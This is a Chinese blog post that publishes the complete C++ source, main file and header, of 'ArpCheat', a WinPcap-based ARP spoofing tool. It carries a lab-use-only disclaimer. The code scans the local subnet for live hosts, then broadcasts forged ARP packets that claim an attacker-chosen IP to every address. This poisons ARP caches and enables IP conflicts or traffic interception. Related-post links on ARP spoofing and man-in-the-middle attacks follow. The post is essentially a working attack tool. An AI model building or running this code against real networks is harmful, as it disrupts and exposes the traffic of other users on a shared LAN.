ARPCheat Source Code

最新推荐文章于 2022-07-03 17:42:02 发布
最新推荐文章于 2022-07-03 17:42:02 发布
阅读量1.5k 收藏
点赞数
分类专栏: 网络安全 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_24281959/article/details/51657226
版权 
// 本程序仅用于信息安全专业实验 若用于攻击行为 后果自负!!
// Warning: Illegal Actions should be avoided or face the consequences.
//ArpCheat.cpp

/*
本代码部分参考于以下3位博客作者:
http://blog.csdn.net/cqcre/article/details/40213911
http://blog.sina.com.cn/s/blog_640be1370100xbi8.html
http://blog.csdn.net/microtong/article/details/3030039
对功能做了组合和添加并添加了部分注释
*/

#include "ArpCheat_Header.h"

char lock = FALSE; // 子线程锁
char lock_main_process = FALSE; // 子线程锁

int main(int argc, char* argv[])
{
	pcap_if_t *alldevs;              //全部网卡列表
	pcap_if_t *d;      
	int i_store;//一个网卡
	int inum = 0;                        //用户选择的网卡序号
	int i = 0;                         //循环变量
//	pcap_t *adhandle;                //一个pcap实例
	char errbuf[PCAP_ERRBUF_SIZE];   //错误缓冲区
	unsigned char *mac;              //本机MAC地址
	unsigned char *packet;           //ARP包
	unsigned long fakeIp;            //要伪装成的IP地址
	pcap_addr_t *pAddr;               //网卡地址
	unsigned long ip;                //IP地址
	unsigned long netmask;           //子网掩码
	char ip_v4[16] = "0";

	sp.ip = (char *)malloc(sizeof(char) * 16); //申请内存存放IP地址  
	sp.netmask = (char *)malloc(sizeof(char) * 16); //申请内存存放NETMASK地址  

	/* 获得本机网卡列表 */
	if (pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL, &alldevs, errbuf) == -1)
	{
		fprintf(stderr, "Error in pcap_findalldevs: %s\n", errbuf);
		exit(1);
	}

	/* 打印网卡列表 */
	for (d = alldevs; d; d = d->next)
	{
		printf("%d", ++i);
		if (d->description)
			printf(". %s\n", d->description);
		else
			printf(". No description available\n");
	}
	//如果没有发现网卡
	if (i == 0)
	{
		printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
		return -1;
	}
	strcpy(sp.ip, "0.0.0.0");
	i_store = i;
	while (!strcmp(sp.ip,invalidipAddr)) // 不合法地址
	{
		if (i == inum - 1)
		{
			printf("Enter the interface number (1-%d except%d):",i_store, i+1);
			scanf("%d", &inum);
		}
		else
		{
			//请用户选择一个网卡
			printf("Enter the interface number (1-%d):", i);
			scanf("%d", &inum);
		}

		//如果用户选择的网卡序号超出有效范围,则退出
		if (inum < 1 || inum > i_store)
		{
			printf("\nInterface number out of range.\n");
			/* Free the device list */
			pcap_freealldevs(alldevs);
			return -1;
		}

		/* 移动指针到用户选择的网卡 */
		for (d = alldevs, i = 0; i< inum - 1; d = d->next, i++);

		mac = GetSelfMac(d->name + 8); //+8以去掉"rpcap://"
		printf("本机Mac地址为: (%.2X-%.2X-%.2X-%.2X-%.2X-%.2X) \n",
			mac[0], mac[1], mac[2], mac[3], mac[4], mac[5]);
		/* 打开网卡 */
		//	if ((adhandle = pcap_open(d->name,          // name of the device
		if ((sp.adhandle = pcap_open(d->name,          // name of the device
			65536,            // portion of the packet to capture
			0,                //open flag
			1000,             // read timeout
			NULL,             // authentication on the remote machine
			errbuf            // error buffer
			)) == NULL)
		{
			fprintf(stderr, "\nUnable to open the adapter. %s is not supported by WinPcap\n",
				d->name);
			/* Free the device list */
			pcap_freealldevs(alldevs);
			return -1;
		}
		for (pAddr = d->addresses; pAddr; pAddr = pAddr->next)
		{
			//得到用户选择的网卡的一个IP地址
			ip = ((struct sockaddr_in *)pAddr->addr)->sin_addr.s_addr;
			char *ipstr;
			//将地址转化为字符串  
			ipstr = iptos(((struct sockaddr_in *)pAddr->addr)->sin_addr.s_addr); //*ip_addr  
			memcpy(sp.ip, ipstr, 16);

			//得到该IP地址对应的子网掩码
			netmask = ((struct sockaddr_in *)(pAddr->netmask))->sin_addr.S_un.S_addr;
			char *netmaskstr;
			netmaskstr = iptos(((struct sockaddr_in *)(pAddr->netmask))->sin_addr.s_addr);
			memcpy(sp.netmask, netmaskstr, 16);

			if (!ip || !netmask){
				continue;
			}
			printf("ip:%s\n", ipstr);
			printf("netmask:%s\n", netmaskstr);
			break;
		}
		if (!strcmp(sp.ip, invalidipAddr))
		{
			printf("选取的该网卡不合法,请重新选取.\n");
		}
	}

	sp.mac = mac;
	gp.adhandle = sp.adhandle;

	sendthread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)SendArpPacket,&sp, 0, NULL);
	printf("\n正在监听网卡: %s\n", d->description);
	recvthread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)GetLivePC, &gp,0, NULL);

	while (lock_main_process == FALSE); // 等待子进程结束

	printf("请输入想要伪造的IP地址: ");
	//从参数列表获得要伪装的IP地址
	scanf("%s", ip_v4);
	//	fakeIp = inet_addr(argv[1]);
	fakeIp = inet_addr(ip_v4);
	if (INADDR_NONE == fakeIp)
	{
		fprintf(stderr, "Invalid IP: %s\n", argv[1]);
		return -1;
	}

	unsigned long netsize = ntohl(~netmask); //网络中主机数
	unsigned long net = ip & netmask; //子网地址
	for (unsigned long n = 1; n<netsize; n++){
		//第i台主机的IP地址,网络字节顺序
		unsigned long destIp = net | htonl(n);
		//构建假的ARP请求包,达到本机伪装成给定的IP地址的目的
		packet = BuildArpPacket(mac, fakeIp, destIp);
	//	if (pcap_sendpacket(adhandle, packet, 60) == -1){
		if (pcap_sendpacket(sp.adhandle, packet, 60) == -1){
			fprintf(stderr, "pcap_sendpacket error.\n");
		}
	}
	return 0;
}
/**
* 获得网卡的MAC地址
* pDevName 网卡的设备名称
*/
unsigned char* GetSelfMac(char* pDevName){
	static u_char mac[6];
	memset(mac, 0, sizeof(mac));
	LPADAPTER lpAdapter = PacketOpenAdapter(pDevName);
	if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))
	{
		return NULL;
	}
	PPACKET_OID_DATA OidData = (PPACKET_OID_DATA)malloc(6 + sizeof(PACKET_OID_DATA));
	if (OidData == NULL)
	{
		PacketCloseAdapter(lpAdapter);
		return NULL;
	}
	// 
	// Retrieve the adapter MAC querying the NIC driver
	//
	OidData->Oid = OID_802_3_CURRENT_ADDRESS;
	OidData->Length = 6;
	memset(OidData->Data, 0, 6);
	BOOLEAN Status = PacketRequest(lpAdapter, FALSE, OidData);
	if (Status)
	{
		memcpy(mac, (u_char*)(OidData->Data), 6);
	}
	free(OidData);
	PacketCloseAdapter(lpAdapter);
	return mac;
}
/**
* 封装ARP请求包
* source_mac 源MAC地址
* srcIP 源IP
* destIP 目的IP
*/
unsigned char* BuildArpPacket(unsigned char* source_mac,
	unsigned long srcIP, unsigned long destIP)
{
	static struct arp_packet packet;
	//目的MAC地址为广播地址,FF-FF-FF-FF-FF-FF
	memset(packet.eth.dest_mac, 0xFF, 6);
	//源MAC地址
	memcpy(packet.eth.source_mac, source_mac, 6);
	//上层协议为ARP协议,0x0806
	packet.eth.eh_type = htons(0x0806);
	//硬件类型,Ethernet是0x0001
	packet.arp.hardware_type = htons(0x0001);
	//上层协议类型,IP为0x0800
	packet.arp.protocol_type = htons(0x0800);
	//硬件地址长度:MAC地址长度为0x06
	packet.arp.add_len = 0x06;
	//协议地址长度:IP地址长度为0x04
	packet.arp.pro_len = 0x04;
	//操作:ARP请求为1
	packet.arp.option = htons(0x0001);
	//源MAC地址
	memcpy(packet.arp.sour_addr, source_mac, 6);
	//源IP地址
	packet.arp.sour_ip = srcIP;
	//目的MAC地址,填充0
	memset(packet.arp.dest_addr, 0, 6);
	//目的IP地址
	packet.arp.dest_ip = destIP;
	//填充数据,18B
	memset(packet.arp.padding, 0, 18);
	return (unsigned char*)&packet;
}

/* 向局域网内所有可能的IP地址发送ARP请求包线程 */
DWORD WINAPI SendArpPacket(LPVOID lpParameter) //(pcap_t *adhandle,char *ip,unsigned char *mac,char *netmask)
{
	sparam *spara = (sparam *)lpParameter;
	pcap_t *adhandle = spara->adhandle;
	char *ip = spara->ip;
	unsigned char *mac = spara->mac;
	char *netmask = spara->netmask;
	printf("Mac :%02x-%02x-%02x-%02x-%02x-%02x\n", mac[0], mac[1], mac[2],
		mac[3], mac[4], mac[5]);
	printf("IP :%s\n", ip);
	printf("NetMask :%s\n", netmask);
	printf("\n");
	unsigned char sendbuf[42]; //arp包结构大小
	ethernet_head eh;
	arp_head ah;
	//赋值MAC地址
	memset(eh.dest_mac, 0xff, 6);       
	//目的地址为全为广播地址
	memcpy(eh.source_mac, mac, 6);
	memcpy(ah.sour_addr, mac, 6);
	memset(ah.dest_addr, 0x00, 6);
	eh.eh_type = htons(0x0806); 
	//以太网帧类型表示后面数据的类型,对于ARP请求或应答来说,该字段的值为x0806  
	ah.hardware_type = htons(1); 
	//硬件类型字段值为表示以太网地址
	ah.protocol_type = htons(0x0800); 
	//协议类型字段表示要映射的协议地址类型值为x0800表示IP地址  
	ah.add_len = 6;
	ah.pro_len = 4;
	ah.sour_ip = inet_addr(ip); 
	//请求方的IP地址为自身的IP地址
	ah.option = htons(1); 
	//ARP请求 
	//向局域网内广播发送arp包
	unsigned long myip = inet_addr(ip);
	unsigned long mynetmask = inet_addr(netmask);
	unsigned long hisip = htonl((myip & mynetmask));
	//向255个主机发送
	for (int i = 0; i < HOSTNUM; i++) {
		ah.dest_ip = htonl(hisip + i);
		//构造一个ARP请求
		memset(sendbuf, 0, sizeof(sendbuf));
		memcpy(sendbuf, &eh, sizeof(eh));
		memcpy(sendbuf + sizeof(eh), &ah, sizeof(ah));
		//如果发送成功
		if (pcap_sendpacket(adhandle, sendbuf, 42) == 0) {
			//printf("\nPacketSend succeed\n");
		}
		else {
			printf("PacketSendPacket in getmine Error: %d\n", GetLastError());
		}
		Sleep(50);
	}
	Sleep(1000);
	lock = TRUE;
	return 0;
}

/* 分析截留的数据包获取活动的主机IP地址 */
DWORD WINAPI GetLivePC(LPVOID lpParameter) //(pcap_t *adhandle)
{
	gparam *gpara = (gparam *)lpParameter;
	pcap_t *adhandle = gpara->adhandle;
	int res;
	unsigned char Mac[6];
	struct pcap_pkthdr * pkt_header;
	const u_char * pkt_data;
	while (true) {
		if (lock) {
			printf("获取MAC地址完毕,请输入你要发送对方的IP地址:\n");
			break;
		}
		if ((res = pcap_next_ex(adhandle, &pkt_header, &pkt_data)) >= 0) 
		{
			if (*(unsigned short *)(pkt_data + 12) == htons(0x0806)) 
			{
				arp_packet *recv = (arp_packet *)pkt_data;
				if (*(unsigned short *)(pkt_data + 20) == htons(2)) 
				{
					printf("+-----------------------------------------------+\n");
					printf("| IP地址:%d.%d.%d.%d   MAC地址:",
						recv->arp.sour_ip & 255,
						recv->arp.sour_ip >> 8 & 255,
						recv->arp.sour_ip >> 16 & 255,
						recv->arp.sour_ip >> 24 & 255);
					for (int i = 0; i < 6; i++) {
						Mac[i] = *(unsigned char *)(pkt_data + 22 + i);
						printf("%02x", Mac[i]);
					}
					printf("\t| \n");
				}
			}
		}
		Sleep(10);
	}
	printf("+-----------------------------------------------+\n");
	lock_main_process = TRUE;
	return 0;
}

/* 将数字类型的IP地址转换成字符串类型的 */

char *iptos(u_long in)
{
	static char output[IPTOSBUFFERS][3 * 4 + 3 + 1];
	static short which;
	u_char *p;

	p = (u_char *)∈
	which = (which + 1 == IPTOSBUFFERS ? 0 : which + 1);
	sprintf_s(output[which], "%d.%d.%d.%d", p[0], p[1], p[2], p[3]);
	return output[which];
}
Header File: 
//ArpCheat.h

#define _WINSOCK_DEPRECATED_NO_WARNINGS
#define _CRT_SECURE_NO_WARNINGS
#define IPTOSBUFFERS    12    
#define HOSTNUM         255   //主机数量  

#include <stdio.h>
#include <stdlib.h>
#include <pcap.h>
#include <conio.h>
#include <Packet32.h>
#include <winsock2.h>
#include "ntddndis.h"

#ifndef MY_ARP_CHEAT_INCLUDE_H
#define MY_ARP_CHEAT_INCLUDE_H

HANDLE sendthread;      //发送ARP包线程  
HANDLE recvthread;       //接受ARP包线程  

char invalidipAddr[16] = "0.0.0.0";

//字节对齐必须是1
#pragma pack (1)
struct ethernet_head
{
	unsigned char dest_mac[6];   //目标主机MAC地址
	unsigned char source_mac[6]; //源端MAC地址
	unsigned short eh_type;      //以太网类型
};
struct arp_head
{
	unsigned short hardware_type; //硬件类型:以太网接口类型为1
	unsigned short protocol_type; //协议类型:IP协议类型为0X0800
	unsigned char add_len;		  //硬件地址长度:MAC地址长度为6B
	unsigned char pro_len;		  //协议地址长度:IP地址长度为4B
	unsigned short option;		  //操作:ARP请求为1,ARP应答为2
	unsigned char sour_addr[6];   //源MAC地址:发送方的MAC地址
	unsigned long sour_ip;		  //源IP地址:发送方的IP地址
	unsigned char dest_addr[6];   //目的MAC地址:ARP请求中该字段没有意义;ARP响应中为接收方的MAC地址
	unsigned long dest_ip;		  //目的IP地址:ARP请求中为请求解析的IP地址;ARP响应中为接收方的IP地址
	unsigned char padding[18];
};
struct arp_packet         //最终arp包结构
{
	ethernet_head eth;    //以太网头部
	arp_head arp;         //arp数据包头部
};

struct sparam {
	pcap_t *adhandle;
	char *ip;
	unsigned char *mac;
	char *netmask;
};

struct gparam {
	pcap_t *adhandle;
};

struct sparam sp;
struct gparam gp;

#pragma pack ()
/**
* 获得网卡的MAC地址
* pDevName 网卡的设备名称
*/
unsigned char* GetSelfMac(char* pDevName);
/**
* 封装ARP请求包
* source_mac 源MAC地址
* srcIP 源IP
* destIP 目的IP
*/
unsigned char* BuildArpPacket(unsigned char* source_mac,
	unsigned long srcIP, unsigned long destIP);
/**
* 封装ARP请求包
* 向全网广播
*/
DWORD WINAPI SendArpPacket(LPVOID lpParameter);
/**
* 将数字类型的IP地址转换成字符串类型的
*/
char *iptos(u_long in);
/**
* 获取当前在线pc的ipAddr和MacAddr
*/
DWORD WINAPI GetLivePC(LPVOID lpParameter); //(pcap_t *adhandle)

#endif

CodeCold
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ArpCheat,一个ARP欺骗工具,附源代码
10-16
ArpCheat,代码是在网上抄的,修改过!还可以,可以通过广播实现欺骗全网段!
ARP欺骗源代码(基于WinPcap实现)
baggiowangyu的专栏
12-18 1万+
//ArpCheat.h #ifndef MY_ARP_CHEAT_INCLUDE_H #define MY_ARP_CHEAT_INCLUDE_H //字节对齐必须是1 #pragma pack (1) struct ethernet_head { unsigned char dest_mac[6]; //目标主机MAC地址 unsigned char source_mac[
CheatARP局域网IP冲突器
11-10
解压密码123456,首先此软件是基于WinPcap的,请在安装了WinPcap_3_0_a.exe后再使用该程序。 此程序只适合局域网使用,对同网段的机器有效。 该程序主要要两个功能一个就是一般的ARP欺骗,即更新目标机器的arp高速缓存 为自己伪造的IP地址和MAC地址。二就是进行IP冲突。内有详细说明
ARP欺骗源码(基于WinPcap实现)
佟强
10-07 6572
ARP欺骗源码(基于WinPcap实现)   佟强  2008.10.8 //ArpCheat.h #ifndef MY_ARP_CHEAT_INCLUDE_H #define MY_ARP_CHEAT_INCLUDE_H //字节对齐必须是1 #pragma pack (1) struct ethernet_head{ unsigned
ARPCheat.rar_Arpcheat_arp_arp spoofing tool_arp欺骗_局域网ARP
07-14
ARP欺骗工具,用于局域网,希望大家只是作为参考不要用于局域网!
arp欺骗程序代码,C++编程
12-31
C++编程,局域网arp欺骗,显示主机IP,主机名,相当给力,附源码!
黑客反向工程
02-16
//ArpCheat.h #ifndef MY_ARP_CHEAT_INCLUDE_H #define MY_ARP_CHEAT_INCLUDE_H //字节对齐必须是1 #pragma pack (1) struct ethernet_head { unsigned char dest_mac[6]; //目标主机MAC地址 unsigned ...
基于winpcap的局域网主机存活探测
05-03
至于压缩包中的**ArpCheat**,可能是指该程序的主执行文件或者源代码文件。这个名字暗示了程序可能包含了一些技巧或策略,如模拟ARP请求,以更有效地进行主机存活检测,或者可能包括防止被检测主机识别为恶意扫描的...
局域网arpsniffer源码剖析
liujiayu2的专栏
08-03 2282
代码是别人写的,我重构了一下,加了点注释,亲测可用。 arp.h #pragma once //netbios服务根据ip解析MAC是需要用的结构体 typedef struct _ASTAT { ADAPTER_STATUS adapt; NAME_BUFFER NameBuff[30]; } ASTAT, * PASTAT; //ip-mac对应表 typedef s
ARP源码实现及代码说明,可直接编译使用
热门推荐
badman250的专栏
11-19 3万+
ARP源码 IP地址 typedef structIP_Address //32位的IP地址 {     u_char byte1;     u_char byte2;     u_char byte3;     u_char byte4;   }ip_address; MAC地址结构 typedef structHard_Mac //48位的MAC地址 {
局域网ARP欺骗终极解决方法
yohohohoho的专栏
09-03 2184
<br /> 何为ARP欺骗?<br />    局域网的网络流通不是根据IP地址进行,而是按照电脑MAC地址进行传输。所以,ARP欺骗一般会伪造或者克隆出来某台电脑的MAC地址在网络上进行传输通信,这样就会造成网络存在大量的数据包,从而导致网络瘫痪,这就是一个简单的ARP欺骗。<br />    ARP欺骗的症状<br />    1)网络时断时通;<br />    2)网络中断,重启网关设备,网络短暂连通<br />    3)内网通讯正常、网关不通;<br />    4)频繁提示IP地址冲突;<b
利用WinPcap编程,实现基于ARP欺骗的中间人攻击
Ni9htMar3的博客
01-19 8513
*******此实验旨在交流学习,请勿用在非正常合法途径*******利用WinPcap编程,实现基于ARP欺骗的中间人攻击 一、实验内容 利用WinPcap,分别向被欺骗主机和网关发送APR请求包, 达到同时欺骗目标主机和网关的目的; 所有目标主机和网关之间的数据都会被我们劫持,过滤 两者之间的所有http交互数据包,并保存为文件。 (http包的过滤可用80端口来标识) 二、设计思想 理解ARP
arp 欺骗的技术原理及应用
LionD8' Blog 个人作品 www.360kdj.com 360KDJ股票实验室
03-06 3271
arp 欺骗的技术原理及应用 WriteBy: LionD8 email:   LionD8@126.com Wesite:   http://liond8.126.com       你知道,数据包在局域网上是怎么传输的吗?是靠什么来传输的吗?也许你会说是靠IP地址,那么你只正确了一半。其实真正在传输过程中是靠计算机的网卡地址即MAC来传输。    现在我们就用实例来模拟一下传输的全
Python ARPcheat
weixin_45972507的博客
07-03 97
实现arp欺骗
arp欺骗
jiangbianxiumu的专栏
08-01 470
arp是什么?中文名:地址解析协议。我们知道在局域网中网络数据包得发送不是根据ip进行传输,而是根据mac地址。当某一个主机A准备发送一个数据包时,首先他会发送一个广播,告诉周围的计算机我将要发送一个ip是**.**.**.**的数据包,如果哪一台主机的网卡是这个ip地址,请立即告诉我你的mac地址。这个询问的过程就是一个arp请求,而回答这个请求的主机发出去的数据包就是一个arp应答。  
ARP欺骗的源代码
weixin_33967071的博客
10-13 302
#include &lt;stdlib.h&gt;#include &lt;stdio.h&gt;#include &lt;pcap.h&gt; //winpcap的头文件#include &lt;winsock2.h&gt;#include &lt;process.h&gt; //多线程编程的头文件#include &lt;windows.h&gt;#include &lt;Iphlpapi.h...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值